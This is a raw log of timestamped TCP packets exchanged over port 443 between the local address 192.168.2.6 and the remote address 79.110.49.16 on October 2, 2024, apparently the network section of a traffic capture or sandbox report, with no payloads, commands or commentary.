Oct 2, 2024 06:25:32.549169064 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.549177885 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.549217939 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.616847038 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.616863966 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.616945028 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.616966009 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.617003918 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.623152971 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.623167992 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.623238087 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.623244047 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.623280048 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.632819891 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.632841110 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.632900000 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.632906914 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.632949114 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.633357048 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.633372068 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.633428097 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.633433104 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.633472919 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.633888006 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.633903027 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.633961916 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.633966923 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.634002924 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.634516954 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.634531975 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.634583950 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.634588003 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.634624004 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.635143995 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.635160923 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.635224104 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.635227919 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.635263920 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.635508060 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.635523081 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.635572910 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.635580063 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.635603905 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.635621071 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.703197956 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.703221083 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.703327894 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.703349113 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.703402996 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.709839106 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.709866047 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.709950924 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.709973097 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.710016966 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.719212055 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.719227076 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.719289064 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.719295979 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.719335079 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.719816923 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.719831944 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.719892025 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.719897985 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.719938993 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.720236063 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.720249891 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.720310926 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.720315933 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.720357895 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.721399069 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.721415043 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.721473932 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.721481085 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.721524000 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.721987009 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.722011089 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.722057104 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.722063065 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.722098112 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.722109079 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.722553968 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.722570896 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.722623110 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.722629070 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.722642899 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.724247932 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.789767027 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.789789915 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.789845943 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.789863110 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.789879084 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.789908886 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.796149015 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.796164989 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.796220064 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.796231031 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.796247959 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.796448946 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.805558920 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.805576086 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.805639029 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.805648088 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.805677891 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.805691957 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.806099892 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.806116104 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.806174040 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.806183100 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.806222916 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.806623936 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.806643963 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.806690931 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.806695938 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.806726933 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.806739092 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.807750940 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.807769060 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.807812929 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.807817936 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.807852983 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.807871103 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.808286905 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.808304071 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.808360100 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.808365107 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.808404922 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.808845043 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.808866024 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.808917046 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.808922052 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.808947086 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.808959007 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.876106977 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.876137972 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.876257896 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.876269102 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.876318932 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.882492065 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.882517099 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.882580996 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.882590055 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.882638931 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.891901016 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.891917944 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.891983986 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.891989946 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.892030954 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.892539978 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.892555952 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.892616034 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.892626047 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.892663956 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.893176079 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.893193007 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.893249989 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.893255949 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.893424988 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.894167900 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.894197941 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.894258022 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.894263983 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.894356966 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.894778013 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.894798040 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.894855976 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.894860983 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.894901991 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.895359993 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.895375013 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.895431042 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.895437002 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.895481110 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.962989092 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.963013887 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.963083982 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.963093996 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.963136911 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.972311020 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.972327948 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.972448111 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.972455025 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.972503901 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.978820086 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.978837013 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.978904009 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.978909016 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.978949070 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.979614019 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.979631901 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.979691029 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.979696989 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.979738951 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.980148077 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.980168104 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.980227947 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.980233908 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.980278969 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.981525898 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.981547117 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.981605053 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.981605053 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.981616020 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.981647015 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.981687069 CEST	443	49736	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:32.981729984 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:32.982055902 CEST	49736	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:33.021625042 CEST	49737	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:33.021678925 CEST	443	49737	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:33.021800995 CEST	49737	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:33.022115946 CEST	49737	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:33.022131920 CEST	443	49737	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:33.646259069 CEST	443	49737	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:33.650090933 CEST	49737	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:33.650146961 CEST	443	49737	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:33.908490896 CEST	443	49737	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:33.908519983 CEST	443	49737	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:33.908535957 CEST	443	49737	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:33.908660889 CEST	49737	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:33.908765078 CEST	443	49737	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:33.908802032 CEST	49737	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:33.908824921 CEST	49737	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:33.994642973 CEST	443	49737	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:33.994685888 CEST	443	49737	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:33.994755030 CEST	49737	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:33.994837046 CEST	443	49737	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:33.994877100 CEST	49737	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:33.994899988 CEST	49737	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:33.996176004 CEST	443	49737	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:33.996200085 CEST	443	49737	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:33.996273041 CEST	49737	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:33.996311903 CEST	443	49737	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:33.996345043 CEST	49737	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:33.996365070 CEST	49737	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:34.080782890 CEST	443	49737	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:34.080811977 CEST	443	49737	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:34.080909967 CEST	49737	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:34.080943108 CEST	443	49737	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:34.081007957 CEST	49737	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:34.082032919 CEST	443	49737	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:34.082052946 CEST	443	49737	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:34.082134008 CEST	49737	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:34.082149982 CEST	443	49737	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:34.082206011 CEST	49737	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:34.083106041 CEST	443	49737	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:34.083127975 CEST	443	49737	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:34.083178997 CEST	49737	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:34.083193064 CEST	443	49737	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:34.083228111 CEST	49737	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:34.083251953 CEST	49737	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:34.153908968 CEST	443	49737	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:34.153932095 CEST	443	49737	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:34.154068947 CEST	49737	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:34.154083967 CEST	443	49737	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:34.154249907 CEST	49737	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:34.171246052 CEST	443	49737	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:34.171272039 CEST	443	49737	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:34.171375990 CEST	443	49737	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:34.171518087 CEST	49737	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:34.171518087 CEST	49737	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:34.171550989 CEST	443	49737	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:34.171574116 CEST	443	49737	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:34.171591997 CEST	443	49737	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:34.171626091 CEST	49737	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:34.171636105 CEST	443	49737	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:34.171663046 CEST	49737	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:34.221364975 CEST	49737	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:34.233603001 CEST	443	49737	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:34.233628988 CEST	443	49737	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:34.233861923 CEST	49737	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:34.233896971 CEST	443	49737	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:34.233959913 CEST	49737	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:34.234045982 CEST	443	49737	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:34.234061956 CEST	443	49737	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:34.234122992 CEST	49737	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:34.234138966 CEST	443	49737	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:34.234194040 CEST	49737	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:34.238895893 CEST	443	49737	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:34.238913059 CEST	443	49737	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:34.238991976 CEST	49737	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:34.239012003 CEST	443	49737	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:34.239068031 CEST	49737	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:34.240046978 CEST	443	49737	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:34.240063906 CEST	443	49737	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:34.240120888 CEST	49737	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:34.240139008 CEST	443	49737	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:34.240173101 CEST	49737	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:34.240195036 CEST	49737	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:34.254066944 CEST	443	49737	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:34.254086971 CEST	443	49737	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:34.254156113 CEST	49737	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:34.254192114 CEST	443	49737	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:34.254206896 CEST	49737	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:34.254236937 CEST	49737	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:34.254930973 CEST	443	49737	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:34.254950047 CEST	443	49737	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:34.254996061 CEST	49737	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:34.255003929 CEST	443	49737	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:34.255032063 CEST	49737	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:34.255048037 CEST	49737	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:34.255511045 CEST	443	49737	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:34.255532026 CEST	443	49737	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:34.255580902 CEST	49737	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:34.255589962 CEST	443	49737	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:34.255619049 CEST	49737	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:34.255629063 CEST	49737	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:34.255978107 CEST	443	49737	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:34.255995035 CEST	443	49737	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:34.256046057 CEST	49737	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:34.256055117 CEST	443	49737	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:34.256093025 CEST	49737	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:34.315067053 CEST	443	49737	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:34.315093040 CEST	443	49737	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:34.315205097 CEST	49737	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:34.315231085 CEST	443	49737	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:34.315284014 CEST	49737	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:34.327373981 CEST	443	49737	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:34.327406883 CEST	443	49737	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:34.327510118 CEST	49737	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:34.327526093 CEST	443	49737	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:34.327677011 CEST	49737	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:34.327852964 CEST	443	49737	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:34.327872992 CEST	443	49737	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:34.327918053 CEST	49737	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:34.327931881 CEST	443	49737	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:34.327958107 CEST	49737	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:34.327980042 CEST	49737	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:34.328259945 CEST	443	49737	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:34.328282118 CEST	443	49737	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:34.328325033 CEST	49737	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:34.328339100 CEST	443	49737	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:34.328371048 CEST	49737	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:34.328392029 CEST	49737	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:34.330495119 CEST	443	49737	79.110.49.16	192.168.2.6
